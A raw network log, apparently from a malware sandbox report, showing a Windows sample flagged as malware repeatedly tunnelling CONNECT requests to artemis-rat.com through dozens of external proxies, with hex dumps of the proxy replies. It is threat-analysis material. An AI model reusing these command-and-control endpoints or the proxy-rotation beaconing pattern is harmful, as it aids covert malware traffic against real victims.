                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.366813898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.366600990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:48.408075094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1542192.168.2.45465494.177.106.17823247284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.365864992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1543192.168.2.454719120.26.0.1188807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.367655039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.069566011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.400289059 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1544192.168.2.454733103.213.97.74807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.368134975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.069617987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.392651081 CET334INHTTP/1.1 400 Bad Request
                                              Date: Mon, 11 Mar 2024 07:37:25 GMT
                                              Content-Type: text/html
                                              Content-Length: 204
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>tengine</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1545192.168.2.45494049.51.94.124437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.369447947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1546192.168.2.45494131.7.65.184437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.369545937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1547192.168.2.452649148.66.130.187209627284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.369664907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.366445065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.366791010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.366606951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:48.408204079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:00.416273117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1548192.168.2.454861129.213.150.20580807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.386276007 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:24.602891922 CET59INHTTP/1.1 200 Connection Established
                                              Proxy-agent: nginx


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1549192.168.2.454757178.128.82.105332257284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.389051914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.256937027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.356901884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.366923094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.362790108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.366400003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:40.366341114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:48.408046961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:04.338606119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1550192.168.2.454736120.76.42.20988887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.406400919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1551192.168.2.45486545.196.151.8454327284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.407130957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.623992920 CET308INHTTP/1.1 407 Proxy Authentication Required
                                              Server: FaaS v1.3-20220203-7fa38bd5af
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Content-Length: 65
                                              Proxy-Authenticate: Basic realm="Proxy"
                                              Connection: close
                                              Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                              Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1552192.168.2.454779113.161.56.13731287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.407134056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.256937981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.257385015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1553192.168.2.45494281.143.236.2004437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.407141924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1554192.168.2.454704103.83.232.122807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.407361031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1555192.168.2.454812183.96.235.105185727284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.408667088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.069685936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.069695950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.054116011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.757186890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.366384983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.218812943 CET39INHTTP/1.0 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1556192.168.2.45303623.225.72.12235007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.412367105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.569434881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.287106991 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1557192.168.2.454591194.87.59.99807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.437701941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.739589930 CET536INHTTP/1.1 501 Not Implemented
                                              Set-Cookie: SWAFS=eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJfIjoiYXJ0ZW1pcy1yYXQuY29tOjQ0MzE1NC4xNi4xMDUuMzgifQ.-RhoK-33KjwsPYTEp7J3U-vTZ5IIiPQ4Rn1uMoLWFKLG5Xtb8PYdMa_5oKi_evt183CEMTk7Qe9TxdDchZYqrg; Path=/; Domain=artemis-rat.com; Expires=Tue, 12 Mar 2024 07:37:24 GMT; HttpOnly; SameSite=Strict
                                              X-Waf-Req-Id: dfcc5686-0c5d-469a-99f6-450960222ca7-712024
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Data Raw: 38 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 3e 0a 09 09 3c 68 65 61 64 3e 0a 09 09 09 3c 74 69
                                              Data Ascii: 800<!DOCTYPE html><html><head><ti
                                              Mar 11, 2024 08:37:24.739662886 CET536INData Raw: 74 6c 65 3e 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69
                                              Data Ascii: tle>501: Not Implemented</title><meta name="viewport" content="width=device-width, initial-scale=1"><style type="text/css"> *,::after,::before{box-sizing:border-box}html{font-family:sans-serif;line-height:1.15;-webkit-text-size-adjust:100%
                                              Mar 11, 2024 08:37:24.739669085 CET536INData Raw: 6f 74 6f 2c 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 22 53 65 67 6f 65 20
                                              Data Ascii: oto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";font-size:1rem;font-weight:400;line-height:1.15;color:#212529;text-align:left;background-color:#fff}[tabindex="-1"]:focus{outline:0!important}hr{box-s
                                              Mar 11, 2024 08:37:24.739747047 CET536INData Raw: 30 7d 61 64 64 72 65 73 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e
                                              Data Ascii: 0}address{margin-bottom:1rem;font-style:normal;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}dfn{font-sty
                                              Mar 11, 2024 08:37:24.739753962 CET536INData Raw: 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 61 3a 6e 6f 74 28 5b 68 72 65 66 5d 29 3a 6e 6f 74 28 5b 74 61 62 69 6e 64 65 78 5d 29 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74
                                              Data Ascii: text-decoration:underline}a:not([href]):not([tabindex]){color:inherit;text-decoration:none}a:not([href]):not([tabindex]):focus,a:not([href]):not([tabindex]):hover{color:inherit;text-decoration:none}a:not([href]):not([tabindex]):focus{outline:0
                                              Mar 11, 2024 08:37:24.739834070 CET536INData Raw: 69 6e 67 2d 74 6f 70 3a 2e 37 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 37 35 72 65 6d 3b 63 6f 6c 6f 72 3a 23 36 63 37 35 37 64 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 63 61 70 74 69 6f 6e 2d 73 69 64 65 3a 62 6f
                                              Data Ascii: ing-top:.75rem;padding-bottom:.75rem;color:#6c757d;text-align:left;caption-side:bottom}th{text-align:inherit}label{display:inline-block;margin-bottom:.5rem}button{border-radius:0}button:focus{outline:1px dotted;outline:5px auto -webkit-focus-r
                                              Mar 11, 2024 08:37:24.739870071 CET536INData Raw: 70 65 3d 72 65 73 65 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e
